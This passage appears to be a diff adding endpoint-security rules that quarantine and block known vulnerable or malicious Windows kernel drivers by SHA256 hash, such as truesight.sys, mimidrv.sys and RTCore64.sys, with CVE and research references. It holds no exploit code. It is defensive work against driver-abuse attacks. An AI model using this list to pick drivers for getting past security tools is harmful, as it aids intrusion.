+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140601Z",
+ "creation_date": "2026-03-23T11:45:31.140603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46b35f77b7c6dfbafe431538b4b790bb4f709ae3dcbb8e24023809805b31b9d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd129ccd-f4bc-5f7a-b475-71cbe3c09e78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498388Z",
+ "creation_date": "2026-03-23T11:45:31.498392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "067748aeeb35971ba770bf2cd652eef93add635e5228a76b0a2c815d483f520d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd21c610-3d7e-53b0-afd5-054e7746aabe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142629Z",
+ "creation_date": "2026-03-23T11:45:31.142631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd51b2f62eb091d20bd898a9680b6c55f37920e9026142d604e5fd0a2698013d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd2d3628-4315-54b0-a7e3-a280a80e3d7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473417Z",
+ "creation_date": "2026-03-23T11:45:31.473420Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473430Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "213d3b79119bfd48176f99c0e15ec19b0082eaab0dc0a744ab1151e21479ffe2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd2efac5-b10e-5f16-aa61-f805c9b5962a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463356Z",
+ "creation_date": "2026-03-23T11:45:30.463360Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463369Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4af8192870afe18c77381dfaf8478f8914fa32906812bb53073da284a49ae4c7",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd32d148-d91b-5f7f-97ad-9757e97a5e13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809444Z",
+ "creation_date": "2026-03-23T11:45:31.809447Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34330c8d41b2600513912d286a6a9c7b9839b2a34ab6b6118db18bc7e4c80718",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd3d90d8-2535-5daa-9e7e-4d0e5798139a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822411Z",
+ "creation_date": "2026-03-23T11:45:31.822414Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822422Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7516a0d5bf936c2c9718250219bdd5a61f92767006f744e4f8c11b1698e684fb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd4086b8-b296-59b1-b0cc-7eae15ce3836",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486138Z",
+ "creation_date": "2026-03-23T11:45:31.486141Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3fa1e8727a84561d848040a770106a51e69023f35bd05566e3c35229328956e9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd42167b-de94-5c33-ad28-9edb3fb48d7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826456Z",
+ "creation_date": "2026-03-23T11:45:31.826458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c36c1d52bbe66ca632637c419537e3b5d1d366791a7053249649d5d6a1dc331",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd4dfa0c-bb0c-5c3f-960b-e2d864570d4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969853Z",
+ "creation_date": "2026-03-23T11:45:29.969855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "596c497e7e405ceb79ba0ba45f993125d88d50fc18867048d0c7a356ebd0c0ed",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd56913e-891f-59af-8479-51a4d724c94c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983317Z",
+ "creation_date": "2026-03-23T11:45:29.983319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983324Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c6f9917418e991ed41540d8d882c8ca51d582a82fd01bff6cdf26591454faf5",
+ "comment": "Vulnerable Kernel Driver (aka dcr.sys) [https://www.loldrivers.io/drivers/b1dd91b1-9ba3-4d68-a2d1-919039e18430/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd5c958e-4343-5885-b4bd-4e0d3326a15b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826674Z",
+ "creation_date": "2026-03-23T11:45:30.826676Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826681Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "903f2d45806520607ad555ba09be0a58bfda695ef8e9369b9a5488e2a62b9824",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd604202-9a23-5f54-bc1d-93b7a69e53ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828120Z",
+ "creation_date": "2026-03-23T11:45:30.828122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62eb6173b66b077a3209dfbd91799d31d903459cbf42cf589070e688704d877b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd66692b-facb-5e41-8080-ceb16408cb74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615485Z",
+ "creation_date": "2026-03-23T11:45:29.615487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615492Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a63937a6320f50c4782d0675104932907d16a91d89088ac979a7a0129aad986",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd74cbe1-e6c3-5148-8ecf-0f4ab516f39a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473672Z",
+ "creation_date": "2026-03-23T11:45:31.473676Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f6f5ce1c93097510f16357742bf393141da37f6f1a2d889c32f93c76029fca9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd76cff3-8e1b-5b8a-b744-fd14d33614e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828148Z",
+ "creation_date": "2026-03-23T11:45:31.828150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b2f24cf8c0550c2d04bf3571f7d406f84f8ebb5c80805030cca52c8a957a815",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd783263-fc82-538b-b16c-4f080e692e96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831272Z",
+ "creation_date": "2026-03-23T11:45:30.831274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "775a8740685d468911625d152917d450ea41968162aeb6fe80bf1c2e36aee862",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd809f73-ef60-5e97-8813-8880c5f82660",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460069Z",
+ "creation_date": "2026-03-23T11:45:30.460072Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9a2bf0f5ba185170441f003dc46fbb570e1c9fdf2132ab7de28b87ba7ad1a0c",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd8a092a-ad18-5fcd-a481-b73145a448d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819278Z",
+ "creation_date": "2026-03-23T11:45:30.819280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819285Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d45600f3015a54fa2c9baa7897edbd821aeea2532e6aadb8065415ed0a23d0c2",
+ "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd9662c8-25a9-5cc1-8679-8e07913bc0d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457592Z",
+ "creation_date": "2026-03-23T11:45:30.457596Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457605Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ecb25cb7a127729a0124d1c0e0ba7dd0c24a02f48f40f6af174b15581b6925c",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd977d02-b5d6-5c63-b14c-feb34aea6e49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973042Z",
+ "creation_date": "2026-03-23T11:45:29.973044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ada4e42bf5ef58ef1aad94435441003b1cc1fcaa5d38bfdbe1a3d736dc451d47",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd9c16ae-128a-5e10-bd0d-d8c200f7c48f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154007Z",
+ "creation_date": "2026-03-23T11:45:31.154009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154014Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e6bc1f84a7867714aa8ba2a45e24b0546b869e58e1e7b33992d4f3583590d27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd9c73b3-810d-5a6f-b8bb-74e23c057d52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
